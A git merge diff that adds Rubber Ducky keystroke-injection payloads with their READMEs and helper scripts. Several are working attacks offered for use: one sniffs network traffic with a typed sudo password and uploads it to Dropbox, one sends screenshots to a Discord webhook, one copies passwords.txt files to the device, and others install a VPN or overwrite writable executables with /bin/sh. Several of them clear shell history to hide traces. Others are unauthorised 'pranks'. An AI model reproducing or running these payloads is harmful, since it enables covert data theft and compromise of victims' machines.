Merge branch 'hak5:master' into master
commit
1f42c9777b
|
@ -0,0 +1,32 @@
|
|||
# Exploiting An Executable File - Linux ✅
|
||||
|
||||
Plug-And-Play ❤️
|
||||
|
||||
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
|
||||
|
||||
**Remember that any execution that is not permitted is not legitimate**.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Linux system
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* You can edit the content that you want to put into the executable file.
|
||||
|
||||
```Shell
|
||||
# You can put whatever you want into the executable file
|
||||
echo "/bin/sh" > "$file"
|
||||
```
|
|
@ -0,0 +1,40 @@
|
|||
|
||||
REM ################################################
|
||||
REM # |
|
||||
REM # Title : Exploiting An Executable File |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ################################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing, it is Plug-And-Play but you can change it as you want.
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### Script ####
|
||||
|
||||
|
||||
STRINGLN
|
||||
function search_file {
|
||||
for file in "$1"/*; do
|
||||
if [[ -d "$file" ]]; then
|
||||
search_file "$file";
|
||||
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
|
||||
echo "File Found: $file";
|
||||
# You can put whatever you want into the executable file
|
||||
# echo "/bin/sh" > "$file"
|
||||
fi
|
||||
done
|
||||
}
|
||||
USER=$(whoami);
|
||||
# You can choose whatever folder you want, the script is recursive.
|
||||
DIR=/home/$USER/Documents;
|
||||
search_file "$DIR";
|
||||
END_STRING
|
||||
ENTER
|
|
@ -0,0 +1,19 @@
|
|||
#!/bin/bash
|
||||
|
||||
function search_file {
|
||||
for file in "$1"/*; do
|
||||
if [[ -d "$file" ]]; then
|
||||
search_file "$file"
|
||||
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
|
||||
echo "File Found: $file"
|
||||
# You can put whatever you want into the executable file
|
||||
# echo "/bin/sh" > "$file"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
USER=$(whoami)
|
||||
|
||||
# You can choose whatever folder you want, the script is recursive.
|
||||
DIR=/home/$USER/Documents
|
||||
search_file "$DIR"
|
|
@ -0,0 +1,27 @@
|
|||
# Set Arbitrary VPN - Linux ✅
|
||||
|
||||
A script used to set an arbitrary VPN on a Linux machine.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script used to set an arbitrary VPN on a Linux machine.
|
||||
|
||||
Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Permissions
|
||||
* Internet Connection
|
||||
* 'openvpn' installed
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the VPN file link
|
|
@ -0,0 +1,71 @@
|
|||
|
||||
REM ####################################
|
||||
REM # |
|
||||
REM # Title : Set Arbitrary VPN |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ####################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet Connection
|
||||
REM - 'openvpn' installed
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
|
||||
DEFINE VPN_FILE_LINK example.com
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRING sudo su
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING SUDO_PASS
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### VPN SECTION ####
|
||||
|
||||
|
||||
STRING curl
|
||||
STRING VPN_FILE_LINK
|
||||
STRING > vpn_configuration.ovpn
|
||||
ENTER
|
||||
REM It depends by the internet connection
|
||||
DELAY 2000
|
||||
|
||||
STRING openvpn vpn_configuration.ovpn
|
||||
REM It depends by the computer power
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRING rm vpn_configuration.ovpn
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING history -c
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Exit from Sudo user
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Close the shell
|
||||
STRING exit
|
||||
ENTER
|
|
@ -0,0 +1,29 @@
|
|||
# Exfiltrate Computer Screenshots
|
||||
|
||||
A script used to prank your friends exfiltrating some screenshots.
|
||||
|
||||
**Category**: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank your friends exfiltrating some screenshots.
|
||||
|
||||
Open a PowerShell, download the Python script and execute it. The Python script will make some screenshot that will be sent, through the discord webhook, to you.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Discord Webhook (or whatever you want for the exfiltration)
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup your Python script link in the payload.txt file
|
||||
- Setup your Discord webhook link in the script.py file
|
|
@ -0,0 +1,39 @@
|
|||
REM ###################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Computer Screenshots |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltrate |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Discord Webhook (or whatever you want for the exfiltration)
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING SCRIPT-PY-LINK
|
||||
STRING " -OutFile "script.py"
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
DELAY 1000
|
||||
ALT F4
|
|
@ -0,0 +1,34 @@
|
|||
import pyautogui
|
||||
from time import sleep
|
||||
import requests
|
||||
|
||||
|
||||
# YOUR DISCORD WEBHOOK
|
||||
discord_webhook = "https://discord.com/api/webhooks/123456789/xxxxxxxxxx"
|
||||
|
||||
# Edit this variables as you want
|
||||
SCREENSHOTS = 10
|
||||
TIMING = 5
|
||||
|
||||
for i in range(SCREENSHOTS):
|
||||
sleep(TIMING)
|
||||
|
||||
# take the screenshot
|
||||
screenshot = pyautogui.screenshot()
|
||||
screenshot.save("screenshot.png")
|
||||
|
||||
with open("screenshot.png", "rb") as f:
|
||||
foto = f.read()
|
||||
|
||||
richiesta = {
|
||||
"username": "ExfiltrateComputerScreenshot"
|
||||
}
|
||||
|
||||
# Send the message by attaching the photo
|
||||
response = requests.post(discord_webhook, data=richiesta, files={"Screen#"+str(i)+".png": foto})
|
||||
|
||||
# Useful for debugging
|
||||
# if response.status_code == 200:
|
||||
# print("Photo successfully sent!")
|
||||
# else:
|
||||
# print("Error while submitting photo." + str(response.status_code))
|
|
@ -0,0 +1,27 @@
|
|||
# Exfiltrate Network Traffic - Linux ✅
|
||||
|
||||
A script used to exfiltrate the network traffic on a Linux machine.
|
||||
|
||||
**Category**: Exfiltrate
|
||||
|
||||
## Description
|
||||
|
||||
A script used to exfiltrate the network traffic on a Linux machine.
|
||||
|
||||
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Permissions
|
||||
* Internet Connection
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Dropbox token
|
||||
* Set the sniffing filter
|
|
@ -0,0 +1,107 @@
|
|||
|
||||
REM #############################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Network Traffic |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #############################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet Connection
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||
DEFINE SNIFFING example
|
||||
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||
DEFINE TOKEN example
|
||||
REM Just a Dropbox const
|
||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
REM Output file path packets.pcap, remember to use pcap extension
|
||||
DEFINE FILE example.pcap
|
||||
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRINGLN sudo su
|
||||
DELAY 1000
|
||||
STRINGLN SUDO_PASS
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### Network Traffic SECTION ####
|
||||
|
||||
|
||||
STRING FILE_PATH="
|
||||
STRING FILE
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING filter_expression="
|
||||
STRING SNIFFING
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Network card name
|
||||
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||
DELAY 500
|
||||
|
||||
REM Network dump
|
||||
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
|
||||
DELAY 500
|
||||
|
||||
REM Get PID
|
||||
STRINGLN tcpdump_pid=$!
|
||||
|
||||
REM Set how long you want to sniff
|
||||
DELAY 60000
|
||||
|
||||
REM Kill the process by PID
|
||||
STRINGLN kill $tcpdump_pid
|
||||
|
||||
|
||||
REM #### Exfiltrate SECTION ####
|
||||
REM You can use whatever you want, i use Dropbox
|
||||
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
||||
DELAY 500
|
||||
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_CONST
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||
ENTER
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRINGLN rm "$FILE_PATH"
|
||||
DELAY 500
|
||||
|
||||
STRINGLN history -c
|
||||
DELAY 500
|
||||
|
||||
REM Exit from Sudo user
|
||||
STRINGLN exit
|
||||
DELAY 500
|
||||
|
||||
REM Close the shell
|
||||
STRINGLN exit
|
|
@ -0,0 +1,12 @@
|
|||
#!/bin/bash
|
||||
|
||||
filter_expression="tcp port 80"
|
||||
|
||||
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||
|
||||
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
|
||||
tcpdump_pid=$!
|
||||
|
||||
sleep 60
|
||||
|
||||
kill $tcpdump_pid
|
|
@ -0,0 +1,47 @@
|
|||
# Exfiltrate Files Through GUI - MacOS
|
||||
|
||||
Copies files with a certain name to ducky
|
||||
|
||||
**Category**: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
A script used to open the finder, look for files with a certain name, then copy them all onto the Ducky
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* None (That is the beauty of it)
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Here you can define what files you want the ducky to look for. Note that the more matches there are the longer it will take to copy.
|
||||
|
||||
```DuckyScript
|
||||
DEFINE #target the_filename_you_want.txt
|
||||
```
|
||||
|
||||
* The main `DELAY` points in this script are before tabing 4 times to access the `DUCKY` USB as it is very random how long it takes (in my testing on an m1 pro 3-6 seconds) to show up and the one after the `COMMMAND v` which has to be adjusted depening on how generic the file name looked for it.
|
||||
|
||||
Delay for USB to show up:
|
||||
```DuckyScript
|
||||
REM This can take annoyingly long to show up which is why the delay is so big
|
||||
DELAY 6000
|
||||
|
||||
REM Go to first result
|
||||
DO_TABS()
|
||||
```
|
||||
|
||||
Delay for how long the file copying takes:
|
||||
```DuckyScript
|
||||
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
|
||||
COMMAND v
|
||||
DELAY 7000
|
||||
```
|
||||
|
||||
https://user-images.githubusercontent.com/69253692/230636177-ca9c5931-44ee-43a2-addc-4ee7f7fb0d62.mov
|
|
@ -0,0 +1,95 @@
|
|||
REM ###################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Files through GUI mac |
|
||||
REM # Author : Kile |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : MacOS |
|
||||
REM # |
|
||||
REM ###################################################
|
||||
|
||||
REM NOTE This is not unlikely to fail depending on the speed of search or if a large amount of files meet the criteria. Adjust DELAYs to your needs
|
||||
|
||||
ATTACKMODE STORAGE HID VID_05AC PID_021E
|
||||
DELAY 2000
|
||||
|
||||
REM the filename for the payload to look for
|
||||
DEFINE #target passwords.txt
|
||||
|
||||
REM Given that it uses the GUI it is a good idea to enable jitter to be less suspicious
|
||||
$_JITTER_ENABLED = TRUE
|
||||
|
||||
REM This function tabs the amount of times it takes from a finder search to go onto the first file result (4)
|
||||
FUNCTION DO_TABS()
|
||||
VAR $COUNTER = 0
|
||||
WHILE ($COUNTER < 4)
|
||||
TAB
|
||||
DELAY 100
|
||||
$COUNTER = ($COUNTER + 1)
|
||||
END_WHILE
|
||||
END_FUNCTION
|
||||
|
||||
REM Open finder
|
||||
COMMAND SPACE
|
||||
STRINGLN finder
|
||||
DELAY 500
|
||||
REM Command n spawns a new window. This makes sure there is only one finder tab (for tabbing to the files later)
|
||||
COMMAND n
|
||||
|
||||
REM Open search bar in finder
|
||||
COMMAND f
|
||||
DELAY 200
|
||||
REM type target filename
|
||||
STRING #target
|
||||
DELAY 200
|
||||
REM This specifies that the passwords.txt has to be a filename and not be in any file
|
||||
DOWN
|
||||
ENTER
|
||||
ENTER
|
||||
|
||||
REM Give a bit to find all files
|
||||
DELAY 500
|
||||
REM now 4 tabs to get to the first file result
|
||||
DO_TABS()
|
||||
|
||||
REM select all files that have the specified target in their name
|
||||
COMMAND a
|
||||
REM Copy the files
|
||||
COMMAND c
|
||||
DELAY 500
|
||||
REM Go back to search window
|
||||
COMMAND f
|
||||
DELAY 200
|
||||
REM Delete previous search
|
||||
DEL
|
||||
|
||||
REM Search for DUCKY USB
|
||||
STRING DUCKY
|
||||
DELAY 200
|
||||
DOWN
|
||||
ENTER
|
||||
REM Specifies that the "DUCKY" has to be an external USB drive
|
||||
STRING Volume
|
||||
DELAY 200
|
||||
DOWN
|
||||
DOWN
|
||||
DOWN
|
||||
ENTER
|
||||
ENTER
|
||||
REM This can take annoyingly long to show up which is why the delay is so big
|
||||
DELAY 6000
|
||||
|
||||
REM Go to first result
|
||||
DO_TABS()
|
||||
|
||||
REM Open the drive
|
||||
COMMAND o
|
||||
DELAY 1000
|
||||
REM This takes a few seconds
|
||||
|
||||
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
|
||||
COMMAND v
|
||||
DELAY 7000
|
||||
|
||||
REM Hide
|
||||
ATTACKMODE OFF
|
|
@ -0,0 +1,32 @@
|
|||
# Alien Message From Computer
|
||||
|
||||
A script used to prank your friends with a script that simulate an Alien inside the computer.
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank your friends with a script that simulate an Alien inside the computer.
|
||||
|
||||
Open a PowerShell, download the Python script and execute it. The Python script will simulate the Alien using the Python library pyttsx3.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Nothing to setup, it is Plug-And-Play
|
||||
|
||||
### FAQs
|
||||
|
||||
- Why is the code in one line?
|
||||
- In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired.
|
|
@ -0,0 +1,40 @@
|
|||
|
||||
REM ####################################################
|
||||
REM # |
|
||||
REM # Title : Alien Message From Computer |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ####################################################
|
||||
|
||||
|
||||
REM Plug-And-Play <3
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1500
|
||||
|
||||
REM Create the file
|
||||
STRING New-Item -Path ".\script.py" -ItemType "file" -Force
|
||||
|
||||
REM Write the code into the file
|
||||
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM Execute the Python script
|
||||
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
ENTER
|
||||
|
||||
REM Close the PowerShell
|
||||
DELAY 1000
|
||||
ALT F4
|
|
@ -0,0 +1,25 @@
|
|||
import os
|
||||
from time import sleep
|
||||
try:
|
||||
import pyttsx3
|
||||
except:
|
||||
os.system("pip install pyttsx3")
|
||||
import pyttsx3
|
||||
|
||||
|
||||
# How much time you want to wait before speak
|
||||
sleep(60)
|
||||
|
||||
alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'
|
||||
|
||||
motore = pyttsx3.init()
|
||||
|
||||
# Set alien voice
|
||||
voce_alienea = motore.getProperty('voices')[1]
|
||||
motore.setProperty('voice', voce_alienea.id)
|
||||
|
||||
# Set the pitch property to make the voice more alien-like
|
||||
motore.setProperty('pitch', 70)
|
||||
|
||||
motore.say(alien_message)
|
||||
motore.runAndWait()
|
|
@ -0,0 +1,23 @@
|
|||
# Change Wallpaper With Screenshot
|
||||
|
||||
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants. LOL
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants.
|
||||
|
||||
Open a PowerShell, download the Python script and execute it. The Python script will make a screenshot that will be set as wallpaper on the computer where is runned.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup your Python script link in the payload.txt file
|
|
@ -0,0 +1,38 @@
|
|||
REM ######################################################
|
||||
REM # |
|
||||
REM # Title : Change Wallpaper With Screenshot |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ######################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING SCRIPT-PY-LINK
|
||||
STRING " -OutFile "script.py"
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
DELAY 1000
|
||||
ALT F4
|
|
@ -0,0 +1,29 @@
|
|||
import os
|
||||
|
||||
try:
|
||||
import pyautogui
|
||||
except:
|
||||
os.system("pip install pyautogui")
|
||||
import pyautogui
|
||||
|
||||
from time import sleep
|
||||
|
||||
from PIL import Image
|
||||
import ctypes
|
||||
|
||||
|
||||
# Edit this time as you want...
|
||||
sleep(30)
|
||||
screenshot = pyautogui.screenshot()
|
||||
screenshot.save("screenshot.png")
|
||||
|
||||
img = Image.open('screenshot.png')
|
||||
|
||||
# Resize the screenshot as the desktop resolution
|
||||
user32 = ctypes.windll.user32
|
||||
screensize = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)
|
||||
img = img.resize(screensize)
|
||||
|
||||
# Set the new wallpaper
|
||||
image_path = os.path.abspath('screenshot.png')
|
||||
ctypes.windll.user32.SystemParametersInfoW(20, 0, image_path, 0)
|
|
@ -0,0 +1,27 @@
|
|||
# Play A Song Through Spotify
|
||||
|
||||
A script used to prank friends by playing songs through spotify
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank friends by playing songs through Spotify. Open a PowerShell, run Spotify, do some TABs for search the song and then play it.
|
||||
|
||||
**Some times** popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 (and the 43 for a DELAY) so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Spotify installed and user logged-in
|
||||
* ExecutionPolicy Bypass
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup the SONG-NAME that you want to play
|
|
@ -0,0 +1,57 @@
|
|||
REM ##################################################
|
||||
REM # |
|
||||
REM # Title : Play A Song Through Spotify |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ##################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Spotify installed and user logged-in
|
||||
REM - ExecutionPolicy Bypass
|
||||
|
||||
|
||||
REM REQUIRED - Set your song name
|
||||
DEFINE SONG-NAME example
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process "spotify://"
|
||||
DELAY 5000
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Some times popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
|
||||
REM ESCAPE
|
||||
REM DELAY 500
|
||||
|
||||
STRING SONG-NAME
|
||||
ENTER
|
||||
DELAY 1000
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
GUI m
|
|
@ -0,0 +1,24 @@
|
|||
# Send Messages In Teams
|
||||
|
||||
A script used to prank your friends sending a message through the user Teams.
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank your friends sending a message through the user Teams.
|
||||
|
||||
Open a PowerShell, stop Teams if is runned, run Teams, run new message function, search the receiver, write and send some messages, then close the app.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Microsoft Teams installed and user logged-in
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup the receiver
|
|
@ -0,0 +1,65 @@
|
|||
REM ###########################################
|
||||
REM # |
|
||||
REM # Title : Send Messages In Teams |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###########################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Microsoft Teams installed and user logged-in
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
REM 1. Open a powershell
|
||||
REM 2. Close if Teams is opens and reopen it
|
||||
REM 3. Goto search bar
|
||||
REM 4. Search the person by name, email, id or what you want...
|
||||
REM 5. Downarrow and enter to open the chat
|
||||
|
||||
REM REQUIRED - Name, email, id or what you want for contact the target
|
||||
DEFINE USER-ID example
|
||||
REM REQUIRED - Messages
|
||||
DEFINE MESSAGE1 example
|
||||
REM ...
|
||||
REM DEFINE MESSAGEN example..
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM #### Powershell ####
|
||||
STRINGLN Stop-Process -Name "Teams"
|
||||
DELAY 1000
|
||||
STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)"
|
||||
REM It depends by the computer power
|
||||
DELAY 10000
|
||||
|
||||
REM #### Teams ####
|
||||
CTRL N
|
||||
DELAY 2000
|
||||
STRING USER-ID
|
||||
ENTER
|
||||
DELAY 2000
|
||||
TAB
|
||||
DELAY 1000
|
||||
TAB
|
||||
DELAY 1000
|
||||
|
||||
REM #### Messages ####
|
||||
STRING MESSAGE1
|
||||
ENTER
|
||||
DELAY 1000
|
||||
REM ...
|
||||
REM STRINGLN MESSAGEN
|
||||
|
||||
DELAY 500
|
||||
ALT F4
|
||||
DELAY 500
|
||||
ALT F4
|
|
@ -0,0 +1,28 @@
|
|||
# Set VSCode to light theme - MacOS ✅
|
||||
|
||||
Plug-And-Play ❤️
|
||||
|
||||
A script that sets the VSCode theme to light to let the nightmare of every developer come true!
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script that opens VSCode, goes to the settings, changes the theme and then sneakily closes the settings again.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* MacOS system
|
||||
* VSCode installed
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
*None*
|
||||
|
||||
|
||||
https://user-images.githubusercontent.com/69253692/231779555-bb0e86d1-61ae-4170-809e-0f0723c58445.mov
|
|
@ -0,0 +1,65 @@
|
|||
REM ################################################
|
||||
REM # |
|
||||
REM # Title : Setting VSCode theme to light |
|
||||
REM # Author : Kile |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : MacOS |
|
||||
REM # |
|
||||
REM ################################################
|
||||
|
||||
REM DESCRIPTION: Opens VSCode settings and sets it to light mode - beware, eyes may be permanently damaged
|
||||
|
||||
ATTACKMODE HID VID_05AC PID_021E
|
||||
DELAY 500
|
||||
|
||||
REM Press the down arrow a lot to select the bottom most theme (which is a light theme)
|
||||
FUNCTION DO_DOWNS()
|
||||
VAR $COUNTER = 0
|
||||
WHILE ($COUNTER < 20)
|
||||
DOWN
|
||||
$COUNTER = ($COUNTER + 1)
|
||||
END_WHILE
|
||||
END_FUNCTION
